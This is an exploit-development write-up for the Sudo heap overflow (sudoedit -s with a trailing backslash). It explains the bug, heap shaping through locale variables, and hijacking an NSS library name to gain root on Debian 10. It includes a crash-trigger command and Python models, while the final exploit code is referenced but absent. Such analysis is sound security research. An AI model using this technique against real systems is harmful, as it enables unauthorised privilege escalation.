Recently the Qualys Research Team did an amazing job discovering a heap overflow vulnerability in Sudo. In the next sections, we will analyze the bug and write an exploit to gain root privileges on Debian 10.
Before analyzing the vulnerability, we need to set up a debugging environment. For this article, I will use:
- Linux distribution: Debian 10 (Buster)
- System info:
Linux debian 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
- Debugger: GDB + PWNDBG
- Package version:
- Checksum (sha256):
- Source code: sudo-1.8.27.tar.gz
- Glibc version:
- Checksum (sha256):
- Source code: glibc-2.28.zip
At the end of the page, you can find the link to download all the files used in this article.
(For debugging purposes, I will temporarily disable ASLR)
Argument parsing is not a joke
As we can see from the Qualys article, when Sudo is executed with the -s option, Sudo’s MODE_SHELL flag is set. Then, at the beginning of Sudo’s main() function, the parse_args() function is called, and it concatenates the command line arguments, escaping all meta-characters with backslashes:
The Qualys researchers discovered that if a command line argument ends with a single backslash, then:
- At line 834, at some point, from[0] will be the backslash and from[1] will be the NULL terminator at the end of the argument, so !isspace((unsigned char)from[1]) will evaluate to true.
- Since the condition at line 834 is satisfied, at line 835 from will be incremented by one, pointing to the NULL terminator.
- At line 836 the NULL terminator will be copied into the heap and from will be incremented by one again, pointing out of the argument’s bounds.
- The while loop will continue copying every character out of the argument’s bounds into the heap, but since size at line 821 was computed as strlen(argument) + 1, this will cause a heap overflow.
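The steps above can be replayed with a small model of the copy loop. This is only a sketch: copy_args and the flat memory buffer are hypothetical stand-ins for Sudo's C code and for the process stack, where the argument strings are followed by the environment strings.

```python
C_SPACE = b" \t\n\v\f\r"  # characters accepted by C's isspace() in the "C" locale

def copy_args(memory, arg_offsets):
    """Model of the unescape-and-copy loop: returns the bytes written to the heap."""
    out = bytearray()
    for start in arg_offsets:
        i = start
        while memory[i] != 0:
            # A backslash followed by a non-space byte is skipped...
            if memory[i] == ord("\\") and memory[i + 1] not in C_SPACE:
                i += 1
            # ...and the next byte is copied unconditionally, even a NUL.
            out.append(memory[i])
            i += 1
        out.append(ord(" "))  # arguments are separated by a space
    out[-1] = 0  # the last separator becomes the string terminator
    return bytes(out)

argument = b"A" * 14 + b"\\"
# The argument string is immediately followed by an environment string.
memory = argument + b"\x00" + b"BBBBB=CCCCC" + b"\x00"

size = len(argument) + 1          # what the buffer was sized for
written = copy_args(memory, [0])  # what the loop actually writes
print(size, len(written))
```

The buffer was sized for 16 bytes, yet the loop writes the fourteen "A"s, the escaped NUL, and then the whole environment string that follows the argument in memory.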
There are some necessary conditions to satisfy to reach the vulnerable code:
- At line 787, MODE_RUN, MODE_EDIT or MODE_CHECK must be set.
- At line 826, MODE_SHELL or MODE_LOGIN_SHELL must be set.
The problem is that, if MODE_RUN and MODE_SHELL or MODE_LOGIN_SHELL are set, then the condition at line 559 in parse_args() will be satisfied before reaching the vulnerable code, and the meta-characters will be escaped.
Apparently, there should not be a way to set MODE_SHELL together with MODE_EDIT or MODE_CHECK without also setting MODE_RUN. Indeed, as we can see from parse_args():
If we set the MODE_EDIT flag, only the MODE_NONINTERACTIVE flag will remain valid at line 353, so we will not be able to set the MODE_SHELL flag, and if we set the MODE_CHECK flag, the other mode flags will be removed at line 501.
The Qualys researchers also managed to bypass these checks by executing Sudo as sudoedit:
As we can see from the code above (again from parse_args()), if we execute Sudo as sudoedit, it will automatically set the MODE_EDIT flag, but valid_flags will be preserved. Indeed, DEFAULT_VALID_FLAGS is defined as:
Executing sudoedit with the -s option, we will set the MODE_EDIT flag and the MODE_SHELL flag, but since the MODE_RUN flag will not be set, we will be able to reach the vulnerable code with an argument that ends with a backslash, and it will not be escaped.
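The interaction between the two checks can be summarised with a tiny flag model. This is a sketch under stated assumptions: the bit values are illustrative placeholders (not Sudo's real constants), the function names are hypothetical, and the two conditions are written as I understand them from the Qualys advisory.

```python
# Illustrative bit values only; the real constants are defined in Sudo's headers.
MODE_RUN, MODE_EDIT, MODE_CHECK = 0x1, 0x2, 0x4
MODE_SHELL, MODE_LOGIN_SHELL = 0x10, 0x20

def escaped_by_parse_args(mode, flags):
    """parse_args() escapes meta-characters only for MODE_RUN plus MODE_SHELL."""
    return bool(mode & MODE_RUN) and bool(flags & MODE_SHELL)

def reaches_copy_loop(sudo_mode):
    """set_cmnd() runs the unescaping loop when both conditions hold."""
    mode_ok = bool(sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK))
    shell_ok = bool(sudo_mode & (MODE_SHELL | MODE_LOGIN_SHELL))
    return mode_ok and shell_ok

def is_vulnerable_path(mode, flags):
    """Unescaping without prior escaping is the dangerous combination."""
    return reaches_copy_loop(mode | flags) and not escaped_by_parse_args(mode, flags)

print("sudo -s     :", is_vulnerable_path(MODE_RUN, MODE_SHELL))
print("sudoedit -s :", is_vulnerable_path(MODE_EDIT, MODE_SHELL))
```

In this model "sudo -s" is safe because the argument is escaped before it is unescaped, while "sudoedit -s" reaches the unescaping loop with raw input.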
sudoedit -s '\' $(python3 -c 'print("A"*0x10000)') will cause a memory corruption:
The Qualys Team, using a fuzzer, collected various crashes, three of which can lead to code execution.
Let’s use GDB to see what happens when the heap overflow occurs.
We can write a couple of lines in Python to start the process and immediately stop it using SIGSTOP; this way we will be able to attach our debugger.
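A minimal sketch of such a launcher is shown here. It is not necessarily the script used in this article: spawn_stopped is a hypothetical helper that forks, makes the child send SIGSTOP to itself, and only then executes the target, so the process is frozen before its first instruction runs.

```python
import os
import signal

def spawn_stopped(path, argv, env):
    """Fork a child that stops itself before exec; return the child's PID."""
    pid = os.fork()
    if pid == 0:
        try:
            # Child: suspend ourselves so a debugger can attach, then exec.
            os.kill(os.getpid(), signal.SIGSTOP)
            os.execve(path, argv, env)
        finally:
            os._exit(127)  # only reached if execve() fails
    # Parent: block until the child has actually entered the stopped state.
    os.waitpid(pid, os.WUNTRACED)
    return pid
```

For the debugging session it could be called as spawn_stopped("/usr/bin/sudoedit", ["sudoedit", "-s", "A" * 14 + "\\"], {"BBBBB": "CCCCC"}), printing the returned PID so that the debugger can be attached to it; the path to sudoedit is an assumption about the local system.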
It is important to note that we need root privileges to attach GDB to Sudo, and we cannot run it inside GDB as a non-privileged user, otherwise it will return the following self-explanatory error:
sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges?
To make the debugging session easier, I copied the necessary source code files into a folder called src and then used the following GDB script to automate the first debugging steps:
We can proceed by running sudoedit using our Python script and attaching GDB to the process using the following command:
As we can see from the image above, size is equal to 16, which is nothing more than strlen("AAAAAAAAAAAAAA\\") + 1. In RAX we can see the heap pointer returned by malloc():
Using pwndbg’s vis_heap_chunks feature, we can visualize the allocated heap chunk. As we can see, its size is 32 bytes:
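The 32-byte figure follows from how glibc rounds a request up to a chunk size. The sketch below reproduces that rounding for x86_64; the constants are the usual 64-bit values and are stated here as assumptions rather than read from the target binary.

```python
SIZE_SZ = 8            # sizeof(size_t) on x86_64
MALLOC_ALIGNMENT = 16  # chunk alignment on x86_64
MINSIZE = 32           # smallest possible chunk

def chunk_size(request):
    """Round a malloc() request up to the size of the chunk that serves it."""
    mask = MALLOC_ALIGNMENT - 1
    size = (request + SIZE_SZ + mask) & ~mask
    return max(size, MINSIZE)

print(hex(chunk_size(16)))    # the 16-byte request from this debugging session
print(hex(chunk_size(0x30)))  # a 48-byte request
```

A 16-byte request therefore lands in a 0x20 chunk, and a 0x30-byte request in a 0x40 chunk, which becomes relevant later when a specific tcache bin is targeted.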
Using continue, we will hit the second breakpoint in the set_cmnd() function. Here the arguments will be copied from the stack to the heap:
Using continue multiple times, the function will copy our “A”s into the heap. Then the backslash, since it has not been escaped by parse_args(), will escape the following NULL terminator, which will be copied into the heap, and the while loop will continue, copying every character out of the argument’s bounds. Since argv is followed by envp on the stack, the environment variable BBBBB=CCCCC will be copied into the heap:
As expected, this will result in a heap overflow. Using vis_heap_chunks we can clearly see that we have overwritten the size of the next chunk with the last two characters of the environment variable:
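The arithmetic behind this observation can be checked quickly. The sketch assumes the standard glibc layout on x86_64, where a 32-byte chunk offers 24 usable bytes (16 bytes of user data plus the prev_size field of the next chunk) before the next chunk's size field begins; the final terminator byte written by the loop is ignored here.

```python
CHUNK_SIZE = 32
USABLE = CHUNK_SIZE - 8  # bytes available before the next chunk's size field

# Bytes written by the copy loop: the "A"s, the escaped NUL, the env string.
written = b"A" * 14 + b"\x00" + b"BBBBB=CCCCC"

spill = written[USABLE:]  # what lands on the next chunk's size field
print(len(written), spill)
```

The first 24 bytes fit inside the chunk, and the remaining two bytes, the trailing "CC" of the environment variable, fall on the size field of the neighbouring chunk.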
The next step is to transform this heap overflow into code execution.
GNU Name Service Switch (NSS)
At line 318 in sudoers_policy_main(), Sudo will call sudoers_lookup() to look up users in the sudoers group and see if they are allowed to run the specified command on the host as the target. To do that, Sudo will rely on the Name Service Switch (NSS).
As we can read from gnu.org:
And from NSS Basics:
Available databases and their respective services are defined in /etc/nsswitch.conf. Each database has its own services and each service corresponds to a shared object which offers various functions.
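To make the database/service relationship concrete, here is a small sketch that parses nsswitch.conf-style text into a mapping. The sample content is illustrative and not copied from the test machine, and parse_nsswitch is a hypothetical helper, not part of glibc.

```python
import re

def parse_nsswitch(text):
    """Map each database name to its ordered list of service names."""
    databases = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if ":" not in line:
            continue
        name, services = line.split(":", 1)
        # Remove bracketed action items such as [NOTFOUND=return].
        services = re.sub(r"\[[^\]]*\]", " ", services)
        databases[name.strip()] = services.split()
    return databases

SAMPLE = """
# illustrative example, not the real file
passwd: files systemd
group:  files systemd
hosts:  files dns [NOTFOUND=return] myhostname
"""

for database, services in parse_nsswitch(SAMPLE).items():
    print(database, "->", services)
```

Each service name in the resulting lists corresponds to one shared object that glibc may need to load.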
From The Naming Scheme of the NSS Modules we can see that:
Sudo will use __nss_database_lookup() to look up the needed database and the respective service:
Then it will pass the service structure, now assigned to the ni variable, and the required function name to __nss_lookup_function().
If the module corresponding to the service has already been loaded, __nss_lookup_function() will directly proceed to construct the function name and look up the symbol in the shared object. Otherwise, __nss_lookup_function() will call nss_load_library() which, after constructing the module name, will call __libc_dlopen_mode() to actually load the shared object into memory (keep this point in mind, it will be extremely important in the exploitation phase):
At this point nss_load_library() will return, __nss_lookup_function() will construct the function name and then it will look up the symbol in the loaded shared object using __libc_dlsym():
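The function name construction is plain string concatenation. The sketch below mirrors the NSS naming scheme (the prefix _nss_, the service name, an underscore, the function name); nss_symbol is a hypothetical helper used only for illustration.

```python
def nss_symbol(service, function):
    """Build the symbol name looked up in an NSS module."""
    return "_nss_" + service + "_" + function

print(nss_symbol("files", "initgroups_dyn"))
```

For the files service and the initgroups_dyn function this yields the symbol that shows up later in the debugging session.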
(If you are interested in dynamic linking, check out my ret2dl_resolve article)
Four important structures are involved in this process:
- name_database, which describes a database.
- name_database_entry, which describes a database entry.
- service_user, which describes a service.
- service_library, which describes a library.
These structures will be used to look up the database and the service with the corresponding library. They will be of primary importance in the exploitation phase.
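As a rough guide to how these structures sit in memory, the sketch below mirrors them with ctypes. The field lists are written from my recollection of glibc 2.28's nss/nsswitch.h and should be verified against the source; pointers are modelled as 64-bit integers to match x86_64.

```python
import ctypes

PTR = ctypes.c_uint64  # every pointer is 8 bytes on x86_64

class ServiceLibrary(ctypes.Structure):
    _fields_ = [("name", PTR), ("lib_handle", PTR), ("next", PTR)]

class ServiceUser(ctypes.Structure):
    _fields_ = [
        ("next", PTR),
        ("actions", ctypes.c_int32 * 5),  # assumed: one action per lookup status
        ("library", PTR),
        ("known", PTR),
        ("name", ctypes.c_char * 0),      # service name stored inline
    ]

class NameDatabaseEntry(ctypes.Structure):
    _fields_ = [("next", PTR), ("service", PTR), ("name", ctypes.c_char * 0)]

class NameDatabase(ctypes.Structure):
    _fields_ = [("entry", PTR), ("library", PTR)]

for field in ("next", "actions", "library", "known", "name"):
    print(field, hex(getattr(ServiceUser, field).offset))
```

Under these assumptions the inline name of a service_user starts 0x30 bytes into the structure, right after the library and known pointers, so reaching it with a linear overflow means writing over those pointers first.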
Let’s proceed by adding a couple of breakpoints to our GDB script to analyze this process in memory:
We can reach the heap overflow point and use continue again to hit the breakpoint in __nss_database_lookup():
From the image above, we can see that Sudo is looking for the group database. Now, using continue one more time, we will directly hit the breakpoint at the end of __nss_lookup_function():
As we can see from the registers, Sudo is trying to look up the _nss_files_initgroups_dyn symbol in the files library. It didn’t call nss_load_library() because there was already a valid library handle in the service_library structure (basically, the shared object has already been loaded):
Using continue again, we will hit the breakpoint in nss_load_library():
This time, after constructing the library name (libnss_systemd.so.2, stored in RDI), Sudo is trying to use __libc_dlopen_mode() to load the shared object into memory. This means that the library has not been loaded yet. Let’s take a look at the service_library structure:
The lib_handle field of the service_library structure is NULL this time. It will be populated with the value returned by __libc_dlopen_mode().
Sudo will proceed to load the shared object into memory, construct the requested function name, and find the symbol in the library using __libc_dlsym().
Now that we have a decent knowledge of how NSS works, we can start writing our exploit.
We know that the NSS library name will be constructed in nss_load_library() by the following piece of code:
From an attacker’s perspective, this means that if we manage to overwrite the name field in the corresponding service_user structure (assigned to the ni variable in __nss_database_lookup()) with a string controlled by us, for example XXXXXX/XXXXXX, the resulting string will be libnss_XXXXXX/XXXXXX.so.2. Since this name contains a slash, __libc_dlopen_mode() will not search the default directory (/usr/lib/x86_64-linux-gnu/); it will treat the name as a relative path and look for the shared object in the folder libnss_XXXXXX in the current directory.
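The effect of a slash in the service name can be shown with a short sketch. nss_library_name is a hypothetical helper that mirrors the concatenation described above (the prefix libnss_, the service name, .so and the revision suffix .2).

```python
import os.path

def nss_library_name(service_name, revision=".2"):
    """Build the shared object name requested for an NSS service."""
    return "libnss_" + service_name + ".so" + revision

legit = nss_library_name("systemd")
hijacked = nss_library_name("XXXXXX/XXXXXX")

print(legit)                    # plain file name: resolved via the library search path
print(hijacked)                 # contains a slash: treated as a relative pathname
print(os.path.split(hijacked))  # (directory, file) the loader will try to open
```

A name without a slash is resolved through the normal library search path, whereas the hijacked name is opened as a path relative to the current working directory.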
At this point we could simply write a malicious shared object, hijack the constructor and gain root privileges.
The first problem arises from the heap layout. Let’s take a step back and visualize the structures in memory, starting from the name_database structure, assigned to the service_table variable in __nss_database_lookup():
If we look at the addresses, we can immediately notice that they are basically contiguous in memory. It means that if we want to use our heap overflow to overwrite the name field in one of the service_user structures, we will almost inevitably overwrite other pointers “along the way”, probably causing a segmentation fault.
For example, even if we managed to obtain an allocation at 0x55555557db00, right before the first database entry, targeting the string at 0x55555557dc30, our overflow would overwrite multiple database entries, multiple services and so on. In other words, the overflow would completely destroy the structures in memory.
We need, in some way, to control the heap layout. Do we have any resource that we can use to create “holes” in the heap? The answer is yes!
At the very beginning of Sudo’s main() function, there is a call to setlocale():
Looking at the setlocale() source code, we can see that it will use malloc() and free() multiple times to allocate/deallocate localization variables. As we can read from opengroup.org:
It means that we can use a string of arbitrary length as @modifier to control the size of the environment variable. Afterwards, the allocated memory region will be freed, creating a “hole” in the heap. Hopefully, using this method, we will be able to control the heap layout.
For our first test, let’s use an argument size of 16 bytes, an envp size of 256 bytes and an LC modifier of 57 bytes. Moreover, let’s set SUDO_ASKPASS=/bin/false to prevent Sudo from asking for the user’s password:
(Of course to identify the correct combination of sizes I had to spend some time in GDB)
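A locale variable with a modifier of a chosen length can be built as follows. This is only a sketch: the C.UTF-8 base locale, the "X" filler and the locale_variable helper are assumptions made for illustration, and the exact strings used by the exploit may differ.

```python
def locale_variable(category, modifier_len, base="C.UTF-8", filler="X"):
    """Build CATEGORY=locale@modifier with a modifier of the requested length."""
    return "{}={}@{}".format(category, base, filler * modifier_len)

LC_SIZE = 57  # modifier length used for the first test

env = [
    locale_variable("LC_TIME", LC_SIZE),
    "SUDO_ASKPASS=/bin/false",  # prevents the interactive password prompt
]
print(env[0], len(env[0]))
```

Changing LC_SIZE changes the length of the string setlocale() has to copy, which is the knob used to shape the freed "holes".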
Let’s modify our Python script to run our C program instead of directly executing sudoedit:
Using continue multiple times, we can reach the breakpoint in __nss_database_lookup(). From here, let’s use the search command to find the LC_TIME variable in memory:
Now let’s take a look at the structures in memory:
The name_database structure (previously assigned to the variable service_table), its first entry and the next one are still close together (the last of them at 0x55555557e920), but now, as we can see from the first address highlighted in green, the service_user structure in the second database entry (group) is located at 0x555555580ea0, more than two pages (0x2000 bytes) away from the other structures!
This is very good news for us, because if we manage to obtain an allocation between the second database entry and the location of its first service, we will be able to use the heap overflow to overwrite the name field in the service_user structure.
Let’s use the tcachebins command to visualize the chunks currently available in tcache:
Awesome! We have three available 0x40 chunks between the second database entry and its first service! Hopefully, allocating a user buffer of a certain size, we should be able to obtain an allocation in one of these chunks.
After updating the USER_BUFF_SIZE variable in the code of our exploit from 16 bytes to 48 bytes (0x30), let’s run the program again until we reach the breakpoint in __nss_database_lookup(), and then use search to locate our buffer in memory:
Perfect! We got an allocation in one of the three chunks: 0x555555580500. Now we only need to modify the envp size to overwrite the name field of the files service. As we have seen in the previous section, the shared object corresponding to the files service has already been loaded into memory, so __nss_lookup_function() will directly try to look up the symbol in the library instead of using nss_load_library() to load it. We can simply overcome this problem by setting the library pointer to NULL.
Wait, but how can we use NULL bytes in envp? Simple, we can populate envp with many backslashes: since they will not be escaped, they will actually escape the following NULL terminator, which will be copied into the heap by set_cmnd() (exactly what we have already seen in the first debugging session)!
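The trick can be verified with a small model of the copy loop applied to a run of one-character environment strings. unescape_copy is a hypothetical stand-in for the loop in set_cmnd(), and the flat buffer imitates the argument followed by envp on the stack.

```python
C_SPACE = b" \t\n\v\f\r"  # characters accepted by C's isspace() in the "C" locale

def unescape_copy(memory, start):
    """Copy bytes from memory[start:] the way the vulnerable loop does."""
    out = bytearray()
    i = start
    while memory[i] != 0:
        if memory[i] == ord("\\") and memory[i + 1] not in C_SPACE:
            i += 1             # skip the backslash...
        out.append(memory[i])  # ...and copy whatever follows, even a NUL
        i += 1
    return bytes(out)

argument = b"AAAA\\" + b"\x00"  # argument ending with a backslash
nul_writers = b"\\\x00" * 3     # three env strings, each a lone backslash
payload = b"END" + b"\x00"      # an ordinary env string ends the copy

heap_bytes = unescape_copy(argument + nul_writers + payload, 0)
print(heap_bytes)
```

Every lone backslash in envp contributes exactly one NUL byte to the heap, so a run of them can zero out pointer fields before the next ordinary string is written.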
Now we can do some math and calculate the right size to overwrite the name field of the files service in the group database:
As we can see in GDB, as expected, the backslashes escape the NULL bytes and set_cmnd() copies them into the heap:
After the heap overflow, we will be able to set every field in the target service_user structure to NULL, and the name field to XXXXXX/XXXXXX:
Finally, as expected, nss_load_library() will construct the library name using our malicious name, and it will try to load the shared object from the libnss_XXXXXX folder in the current directory using __libc_dlopen_mode():
At this point we only need to write a malicious shared object called XXXXXX.so.2 and place it in a folder called libnss_XXXXXX in the current directory:
Executing our exploit again, we will be able to hijack the library and gain root privileges:
As a side note, I also managed to obtain root privileges by hijacking a service_user structure: I overwrote the last two bytes of the service field in the corresponding database entry to make it point to an upper section of the heap, then I created a fake service_user structure in this region with a malicious name.
Now, because of slight differences in the heap layout from system to system, we cannot hard-code sizes in our exploit. For example, another Debian 10 system might require a different ENVP_SIZE and/or a different LC_SIZE. I did some tests and managed to find a pattern that works on multiple systems, but brute forcing will still be required to find the right combination of sizes. Our final exploit will be the following:
It will accept envp_size from the command line, so we can use the following bash script to run it:
We can enable ASLR and run the exploit:
That’s it! We have our exploit for Debian 10! If you have any questions, feel free to contact me. You can download all the files used in this article from my personal GitHub repository:
The exploit is currently tested on:
- Sudo version 1.8.27 (1.8.27-1+deb10u2), checksum (sha256): ca4a94e0a49f59295df5522d896022444cbbafdec4d94326c1a7f333fd030038
- Glibc version 2.28, checksum (sha256): dedb887a5c49294ecd850d86728a0744c0e7ea780be8de2d4fc89f6948386937
- Linux debian 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
- Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
- Linux debian 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux